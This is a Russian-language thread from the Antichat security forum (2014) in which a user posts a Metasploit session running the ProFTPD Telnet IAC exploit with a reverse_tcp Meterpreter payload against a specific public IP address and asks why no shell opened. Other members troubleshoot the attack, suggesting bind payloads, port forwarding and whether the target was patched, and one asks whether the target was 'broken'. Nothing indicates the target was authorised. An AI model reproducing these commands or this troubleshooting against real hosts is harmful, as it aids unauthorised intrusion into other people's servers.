HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.03.2014, 01:50
nike001
Guest
Сообщений: n/a
Провел на форуме:
5283

Репутация: 0
По умолчанию

Что не так?

Код:
Code:
msf > use linux/ftp/proftp_telnet_iac 
msf  exploit(proftp_telnet_iac) > set RHOST 213.239.235.179 
RHOST => 213.239.235.179 
msf  exploit(proftp_telnet_iac) > set RPORT 21 
RPORT => 21 
msf  exploit(proftp_telnet_iac) > set TARGET 0 
TARGET => 0 
msf  exploit(proftp_telnet_iac) > set PAYLOAD linux/x86/meterpreter/reverse_tcp PAYLOAD => linux/x86/meterpreter/reverse_tcp 
msf  exploit(proftp_telnet_iac) > set LHOST 192.168.1.4 
LHOST => 192.168.1.4 
msf  exploit(proftp_telnet_iac) > exploit[*] Started reverse handler on 192.168.1.4:4444[*] Automatically detecting the target... [*] FTP Banner: 220 ProFTPD 1.3.3a Server (Debian) [::ffff:213.239.235.179][*] Selected Target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1 
msf  exploit(proftp_telnet_iac) >
И всё((
 
Ответить с цитированием

  #2  
Старый 14.03.2014, 02:39
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Вам точно нужен reverse-tcp? По возможности используется что-то более прямое.

По вероятности:

1) Целевая версия таки не уязвима

2) Цель уязвима, но не может законнектиться к вам.
 
Ответить с цитированием

  #3  
Старый 14.03.2014, 09:26
nike001
Guest
Сообщений: n/a
Провел на форуме:
5283

Репутация: 0
По умолчанию

Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2?

Спасибо.
 
Ответить с цитированием

  #4  
Старый 14.03.2014, 15:24
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от nike001  
nike001 said:
Нет, версия точно уязвима(если не пропатчена конечно,в чем я сомневаюсь), и есть ли спобоб исправить пункт 2?
Спасибо.
Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер.

Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.
 
Ответить с цитированием

  #5  
Старый 14.03.2014, 15:59
nike001
Guest
Сообщений: n/a
Провел на форуме:
5283

Репутация: 0
По умолчанию

Цитата:
Сообщение от madhatter  
madhatter said:
Судя по баннеру, да, уязвима. Но баннер - это всего лишь баннер.
Насколько я помню, в этом сплойте нет ограничений на тип пейлоада, поэтому используйте любой другой из доступных, где цели не нужно коннектиться к вам.
Спасибо. Хоть кто-то здесь разбирается не только в скулях и xss-ках.
 
Ответить с цитированием

  #6  
Старый 14.03.2014, 16:07
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от nike001  
nike001 said:
Спасибо. Хоть кто-то здесь разбирается не только в скулях и xss-ках.
Np. Так вы расскажите, поломалась цель?
 
Ответить с цитированием

  #7  
Старый 14.03.2014, 16:23
nike001
Guest
Сообщений: n/a
Провел на форуме:
5283

Репутация: 0
По умолчанию

Цитата:
Сообщение от madhatter  
madhatter said:
Np. Так вы расскажите, поломалась цель?
Сейчас буду пробовать. Позже отпишусь.
 
Ответить с цитированием

  #8  
Старый 14.03.2014, 16:39
nike001
Guest
Сообщений: n/a
Провел на форуме:
5283

Репутация: 0
По умолчанию

И shell_bind_tcp, и bind_tcp тоже не работают.

P.S. Если есть у кого киньте ссылку про payloads(виды, и для чего каждый служит)
 
Ответить с цитированием

  #9  
Старый 15.03.2014, 14:17
infoseller
Guest
Сообщений: n/a
Провел на форуме:
49472

Репутация: 0
По умолчанию

А хэндлер-то запущен? и должен быть проброс в локалку...
 
Ответить с цитированием

  #10  
Старый 15.03.2014, 14:26
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию

За все время ни одного хоста с рабочей багой не попадалось, остается собирать на локалке и проверять. 2ТС, скорее всего патченная.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ